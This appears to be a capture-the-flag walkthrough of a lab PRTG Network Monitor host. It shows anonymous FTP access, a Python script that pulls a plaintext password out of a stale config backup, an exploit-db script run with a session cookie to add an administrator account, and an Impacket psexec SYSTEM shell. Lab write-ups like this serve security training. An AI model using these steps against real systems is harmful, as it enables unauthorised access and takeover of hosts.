As usual, I started with an nmap scan. There were a lot of open ports, but what immediately caught my eye was the FTP server. From the screenshot above, you can see that anonymous FTP login was allowed and that the root of the C: drive appeared to be accessible, which meant I could potentially pull a lot of sensitive information from it.
As expected, I was able to obtain the user flag immediately after accessing the FTP server.
Got the user flag.
I navigated to the web page on the target address, and it was titled PRTG Network Monitor.
I googled “PRTG Network Monitor default credentials” and found the credentials above, prtgadmin:prtgadmin. However, they did not work.
I also googled “PRTG Network Monitor exploit” and found the exploit above. As you can see, it is an authenticated exploit, so I first had to find a valid password before I could run it.
While researching PRTG Network Monitor, I found a useful piece of information about where it stores its data. The default data folder is %programdata%\Paessler\PRTG Network Monitor.
I changed into that path over FTP and found three PRTG Configuration files, which I downloaded with the get command.
md5sum showed that the first two files have identical hashes, so their contents are exactly the same. That left me with two files to check: either one of the identical pair, and the PRTG Configuration.old.bak file.
In the first file I checked, the password was stored encrypted.
Inside the PRTG Configuration.old.bak file, I found the credentials.
Username: prtgadmin, Password: PrTg@dmin2018
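The two checks above (hash the downloaded files so identical copies are only reviewed once, then scan what is left for credentials) can be scripted rather than done by hand. The block below is an added example, not code from the original write-up. It assumes that PRTG configuration files are XML, that a plaintext credential sits as text inside a <dbpassword> element, and that an encrypted one is marked with an <encrypted/> flag inside that element; the three sample files are constructed to mirror what the write-up describes, not copied from a target.

```python
"""Added example (not from the original write-up): dedupe the PRTG
configuration files pulled over anonymous FTP by hash, then scan the
unique ones for <dbpassword> entries and report which hold a plaintext
value and which are marked encrypted.

Assumptions (not taken from the page): the files are XML, a plaintext
credential is the text of a <dbpassword> element, and an encrypted one
carries a <flags><encrypted/></flags> marker inside that element.
"""
import hashlib
import xml.etree.ElementTree as ET

# Constructed samples: two byte-identical "live" files and one older
# backup that still carries the credential in the clear.
LIVE = b"""<?xml version="1.0" encoding="utf-8"?>
<data>
  <dbpassword>
    <flags><encrypted/></flags>
    <cell col="0" crypt="PRTG">UNREADABLE_BLOB</cell>
  </dbpassword>
  <login>prtgadmin</login>
</data>
"""
BACKUP = b"""<?xml version="1.0" encoding="utf-8"?>
<data>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <login>prtgadmin</login>
</data>
"""
FILES = {
    "PRTG Configuration.dat": LIVE,
    "PRTG Configuration.old": LIVE,
    "PRTG Configuration.old.bak": BACKUP,
}


def dedupe_by_hash(files):
    """Group file names by content digest so identical files are read once.

    The write-up used md5sum; any digest works for spotting exact
    duplicates, SHA-256 is used here simply because it is the default
    choice today (this is not an integrity check against an adversary).
    """
    groups = {}
    for name, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        groups.setdefault(digest, []).append(name)
    return groups


def find_db_passwords(data):
    """Return [(status, value), ...] for every <dbpassword> element.

    ElementTree drops XML comments, so the "User: prtgadmin" comment in
    the backup does not end up inside the recovered value.
    """
    root = ET.fromstring(data)
    found = []
    for node in root.iter("dbpassword"):
        if node.find("flags/encrypted") is not None:
            cell = node.find("cell")
            found.append(("encrypted", cell.text if cell is not None else ""))
        else:
            found.append(("plaintext", "".join(node.itertext()).strip()))
    return found


def audit(files):
    """Hash-dedupe, then scan one representative of each duplicate group."""
    report = {}
    for names in dedupe_by_hash(files).values():
        report[names[0]] = {
            "duplicates": names[1:],
            "dbpasswords": find_db_passwords(files[names[0]]),
        }
    return report


if __name__ == "__main__":
    for name, info in audit(FILES).items():
        print(name, "(same as: %s)" % ", ".join(info["duplicates"] or ["-"]))
        for status, value in info["dbpasswords"]:
            print("   %-9s %s" % (status, value))
```

Run against the real downloads by replacing FILES with the bytes read from disk; the live file only ever yields an "encrypted" entry, while the stale .bak backup is where the plaintext PrTg@dmin2018 turns up, which is exactly why forgotten backup copies of a config file are worth checking even when the current one looks safe.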
I navigated back to the web page to confirm that the credentials I had obtained actually worked, and they did.
The exploit-db page I found earlier explained the procedure: obtain the session cookie, pass it to the script, and the script creates a new user ‘pentest’ in the Administrators group with the password ‘P3nT3st!’.
I started Burp Suite to intercept the traffic and grab the cookie information.
./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.620613745.1723521193; _gid=GA1.4.536926311.1723521193; OCTOPUS1813713946=ezYyRkZGRkIyLTg4MTYtNEU1NC1BQ0U3LTQ1MjdCRUY1QzI1QX0%3D; _gat=1"
Once I had the cookie string, I replaced the placeholder and ran the script above. Only the OCTOPUS… value is PRTG's session cookie; the _ga, _gid and _gat entries are Google Analytics cookies that happen to be sent alongside it.
The exploit successfully created new user ‘pentest’ with password ‘P3nT3st!’ just as expected!
I could have used msfconsole to get a shell, but I wanted to practise a different route and learned about Impacket. It is a collection of Python classes for working with network protocols and is, of course, widely used by pentesters.
I installed the impacket scripts to use psexec.py. psexec.py is often used during penetration tests to gain remote command execution on a target once valid credentials are obtained. It also helps with lateral movement, since the same stolen or cracked credentials can be used to execute commands on multiple machines.
Running psexec.py with the obtained credentials got me an administrator shell; psexec.py runs its service as SYSTEM, so this is the highest-privilege shell on the box.
Got the root flag!